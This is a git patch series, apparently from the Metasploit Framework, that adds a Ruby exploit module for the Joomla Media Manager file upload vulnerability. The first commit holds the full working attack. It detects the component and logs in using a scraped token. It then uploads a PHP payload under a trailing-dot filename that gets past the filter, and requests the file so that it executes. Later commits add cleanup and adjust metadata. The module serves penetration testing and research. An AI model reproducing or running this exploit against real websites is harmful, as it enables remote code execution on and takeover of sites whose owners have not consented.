From 2086c51b6777f13e560333598393dfd2ebb4373b Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Tue, 13 Aug 2013 16:27:27 -0500
Subject: [PATCH 1/5] Add module for Joomla Upload Exploit in the wild

---
 .../unix/webapp/joomla_media_upload_exec.rb   | 232 ++++++++++++++++++
 1 file changed, 232 insertions(+)
 create mode 100644 modules/exploits/unix/webapp/joomla_media_upload_exec.rb

diff --git a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb
new file mode 100644
index 0000000000..4c7613b867
--- /dev/null
+++ b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb
@@ -0,0 +1,232 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => "Joomla Media Manager File Upload Vulnerability",
+			'Description'    => %q{
+				This module exploits a vulnerability found in Joomla 2.5.13 and earlier 2.5.x
+				versions, 3.1.4 and earlier 3.x versions. The vulnerability exists in the Media
+				Manager component, allowing arbitrary file uploads, which results in arbitrary code
+				execution. The module has been tested successfully on Joomla 2.5.13 and 3.1.4 on
+				Ubuntu 10.04. In order to work properly, if public access isn't allowed to the
+				Media Manager, credentials with access to the component are needed (Editor role
+				typically).
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'Unknown', # Vulnerability Discovery and Exploit in the wild
+					'juan vazquez' # Metasploit module
+				],
+			'References'     =>
+				[
+					[ 'URL', 'http://developer.joomla.org/security/news/563-20130801-core-unauthorised-uploads' ],
+					[ 'URL', 'http://www.cso.com.au/article/523528/joomla_patches_file_manager_vulnerability_responsible_hijacked_websites/' ]
+				],
+			'Payload'        =>
+				{
+					'DisableNops' => true,
+					# Arbitrary big number. The payload gets sent as POST data, so
+					# really it's unlimited
+					'Space'       => 262144, # 256k
+				},
+			'Platform'       => ['php'],
+			'Arch'           => ARCH_PHP,
+			'Targets'        =>
+				[
+					[ 'Joomla 2.5.x <=2.5.13', {} ]
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => "Jul 31 2013",
+			'DefaultTarget'  => 0))
+
+			register_options(
+				[
+					OptString.new('TARGETURI', [true, 'The base path to Joomla', '/joomla']),
+					OptString.new('USERNAME', [false, 'User to login with', '']),
+					OptString.new('PASSWORD', [false, 'Password to login with', '']),
+				], self.class)
+
+	end
+
+	def peer
+		return "#{rhost}:#{rport}"
+	end
+
+	def check
+		res = get_upload_form
+
+		if res and res.code == 200
+			if res.body =~ /You are not authorised to view this resource./
+				print_status("#{peer} - Joomla Media Manager Found but authentication required")
+				return Exploit::CheckCode::Detected
+			elsif res.body =~ /<form action="(.*)" id="uploadForm"/
+				print_status("#{peer} - Joomla Media Manager Found and authentication isn't required")
+				return Exploit::CheckCode::Detected
+			end
+		end
+
+		return Exploit::CheckCode::Safe
+	end
+
+	def upload(upload_uri)
+		begin
+			u = URI(upload_uri)
+		rescue ::URI::InvalidURIError
+			fail_with(Exploit::Failure::Unknown, "Unable to get the upload_uri correctly")
+		end
+
+		data = Rex::MIME::Message.new
+		data.add_part(payload.encoded, "application/x-php", nil, "form-data; name=\"Filedata[]\"; filename=\"#{@upload_name}.\"")
+		post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
+
+		res = send_request_cgi({
+			'method'   => 'POST',
+			'uri'      => "#{u.path}?#{u.query}",
+			'ctype'    => "multipart/form-data; boundary=#{data.bound}",
+			'cookie'   => @cookies,
+			'vars_get' => {
+				'asset'  => 'com_content',
+				'author' => '',
+				'format' => '',
+				'view'   => 'images',
+				'folder' => ''
+			},
+			'data'     => post_data
+		})
+
+		return res
+
+	end
+
+	def get_upload_form
+		res = send_request_cgi({
+			'method'   => 'GET',
+			'uri'      => normalize_uri(target_uri.path, "index.php"),
+			'cookie'   => @cookies,
+			'encode_params' => false,
+			'vars_get' => {
+				'option' => 'com_media',
+				'view'   => 'images',
+				'tmpl'   => 'component',
+				'e_name' => 'jform_articletext',
+				'asset'  =>  'com_content',
+				'author' => ''
+			}
+		})
+
+		return res
+	end
+
+	def get_login_form
+
+		res = send_request_cgi({
+			'method'   => 'GET',
+			'uri'      => normalize_uri(target_uri.path, "index.php", "component", "users", "/"),
+			'cookie'   => @cookies,
+			'vars_get' => {
+				'view' => 'login'
+			}
+		})
+
+		return res
+
+	end
+
+	def login
+		res = send_request_cgi({
+			'method'   => 'POST',
+			'uri'      => normalize_uri(target_uri.path, "index.php", "component", "users", "/"),
+			'cookie'   => @cookies,
+			'vars_get' => {
+				'task' => 'user.login'
+			},
+			'vars_post' => {
+				'username' => @username,
+				'password' => @password
+				}.merge(@login_options)
+			})
+
+		return res
+	end
+
+	def parse_login_options(html)
+		html.scan(/<input type="hidden" name="(.*)" value="(.*)" \/>/) {|option|
+			@login_options[option[0]] = option[1] if option[1] == "1" # Searching for the Token Parameter, which always has value "1"
+		}
+	end
+
+	def exploit
+		@login_options = {}
+		@cookies = ""
+		@upload_name = "#{rand_text_alpha(rand(5) + 3)}.php"
+		@username = datastore['USERNAME']
+		@password = datastore['PASSWORD']
+
+		print_status("#{peer} - Checking Access to Media Component...")
+		res = get_upload_form
+
+		if res and res.code == 200 and res.headers['Set-Cookie'] and res.body =~ /You are not authorised to view this resource./
+			print_status("#{peer} - Authentication required... Proceeding...")
+
+			if @username.empty? or @password.empty?
+				fail_with(Exploit::Failure::BadConfig, "#{peer} - Authentication is required to access the Media Manager Component, please provide credentials")
+			end
+			@cookies = res.get_cookies.sub(/;$/, "")
+
+			print_status("#{peer} - Accessing the Login Form...")
+			res = get_login_form
+			if res.nil? or res.code != 200 or res.body !~ /login/
+				fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to Access the Login Form")
+			end
+			parse_login_options(res.body)
+
+			res = login
+			if not res or res.code != 303
+				fail_with(Exploit::Failure::NoAccess, "#{peer} - Unable to Authenticate")
+			end
+		elsif res and res.code ==200 and res.headers['Set-Cookie'] and res.body =~ /<form action="(.*)" id="uploadForm"/
+			print_status("#{peer} - Authentication isn't required.... Proceeding...")
+			@cookies = res.get_cookies.sub(/;$/, "")
+		else
+			fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Failed to Access the Media Manager Component")
+		end
+
+		print_status("#{peer} - Accessing the Upload Form...")
+		res = get_upload_form
+
+		if res and res.code == 200 and res.body =~ /<form action="(.*)" id="uploadForm"/
+			upload_uri = Rex::Text.html_decode($1)
+		else
+			fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to Access the Upload Form")
+		end
+
+		print_status("#{peer} - Uploading shell...")
+
+		res = upload(upload_uri)
+
+		if res.nil? or res.code != 200
+			fail_with(Exploit::Failure::Unknown, "#{peer} - Upload failed")
+		end
+
+		print_status("#{peer} - Executing shell...")
+		send_request_cgi({
+			'method'   => 'GET',
+			'uri'      => normalize_uri(target_uri.path, "images", @upload_name),
+		})
+
+	end
+
+end

From e4a570d36b5dad9b8b142df15f6ef9c5b3ca3e14 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Tue, 13 Aug 2013 16:42:53 -0500
Subject: [PATCH 2/5] Update metadata according to OSVDB

---
 modules/exploits/unix/webapp/joomla_media_upload_exec.rb | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb
index 4c7613b867..22c2c47606 100644
--- a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb
+++ b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb
@@ -27,11 +27,12 @@ class Metasploit3 < Msf::Exploit::Remote
 			'License'        => MSF_LICENSE,
 			'Author'         =>
 				[
-					'Unknown', # Vulnerability Discovery and Exploit in the wild
+					'Jens Hinrichsen', # Vulnerability discovery according to the OSVDB
 					'juan vazquez' # Metasploit module
 				],
 			'References'     =>
 				[
+					[ 'OSVDB', '95933' ],
 					[ 'URL', 'http://developer.joomla.org/security/news/563-20130801-core-unauthorised-uploads' ],
 					[ 'URL', 'http://www.cso.com.au/article/523528/joomla_patches_file_manager_vulnerability_responsible_hijacked_websites/' ]
 				],
@@ -49,7 +50,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					[ 'Joomla 2.5.x <=2.5.13', {} ]
 				],
 			'Privileged'     => false,
-			'DisclosureDate' => "Jul 31 2013",
+			'DisclosureDate' => "Aug 01 2013",
 			'DefaultTarget'  => 0))
 
 			register_options(

From 04eed493102d2954c518016f62b935a84d582631 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Tue, 13 Aug 2013 16:47:24 -0500
Subject: [PATCH 3/5] Add support for FileDropper

---
 modules/exploits/unix/webapp/joomla_media_upload_exec.rb | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb
index 22c2c47606..72ed8ccd27 100644
--- a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb
+++ b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb
@@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
 
 	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::FileDropper
 
 	def initialize(info={})
 		super(update_info(info,
@@ -222,6 +223,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			fail_with(Exploit::Failure::Unknown, "#{peer} - Upload failed")
 		end
 
+		register_files_for_cleanup("#{@upload_name}.")
 		print_status("#{peer} - Executing shell...")
 		send_request_cgi({
 			'method'   => 'GET',

From 312ff1a20ecf751d63a729ad99be189921e21610 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Tue, 13 Aug 2013 17:50:26 -0500
Subject: [PATCH 4/5] Delete period from regular expressions

---
 modules/exploits/unix/webapp/joomla_media_upload_exec.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb
index 72ed8ccd27..e46d1b60b3 100644
--- a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb
+++ b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb
@@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		res = get_upload_form
 
 		if res and res.code == 200
-			if res.body =~ /You are not authorised to view this resource./
+			if res.body =~ /You are not authorised to view this resource/
 				print_status("#{peer} - Joomla Media Manager Found but authentication required")
 				return Exploit::CheckCode::Detected
 			elsif res.body =~ /<form action="(.*)" id="uploadForm"/
@@ -180,7 +180,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("#{peer} - Checking Access to Media Component...")
 		res = get_upload_form
 
-		if res and res.code == 200 and res.headers['Set-Cookie'] and res.body =~ /You are not authorised to view this resource./
+		if res and res.code == 200 and res.headers['Set-Cookie'] and res.body =~ /You are not authorised to view this resource/
 			print_status("#{peer} - Authentication required... Proceeding...")
 
 			if @username.empty? or @password.empty?

From e912a64ccc57d43dd3e53d519c43bcb368c6d2bc Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Tue, 13 Aug 2013 19:04:25 -0500
Subject: [PATCH 5/5] Description change

---
 .../unix/webapp/joomla_media_upload_exec.rb        | 14 +++++++-------
 1 file changed, 7 insertions(+), 7 deletions(-)

diff --git a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb
index e46d1b60b3..5db200932b 100644
--- a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb
+++ b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb
@@ -17,13 +17,13 @@ class Metasploit3 < Msf::Exploit::Remote
 		super(update_info(info,
 			'Name'           => "Joomla Media Manager File Upload Vulnerability",
 			'Description'    => %q{
-				This module exploits a vulnerability found in Joomla 2.5.13 and earlier 2.5.x
-				versions, 3.1.4 and earlier 3.x versions. The vulnerability exists in the Media
-				Manager component, allowing arbitrary file uploads, which results in arbitrary code
-				execution. The module has been tested successfully on Joomla 2.5.13 and 3.1.4 on
-				Ubuntu 10.04. In order to work properly, if public access isn't allowed to the
-				Media Manager, credentials with access to the component are needed (Editor role
-				typically).
+				This module exploits a vulnerability found in Joomla 2.5.x up to 2.5.13, as well as
+				3.x up to 3.1.4 versions. The vulnerability exists in the Media Manager component,
+				which comes by default in Joomla, allowing arbitrary file uploads, and results in
+				arbitrary code execution. The module has been tested successfully on Joomla 2.5.13
+				and 3.1.4 on Ubuntu 10.04. Note: If public access isn't allowed to the Media
+				Manager, you will need to supply a valid username and password (Editor role or
+				higher) in order to work properly.
 			},
 			'License'        => MSF_LICENSE,
 			'Author'         =>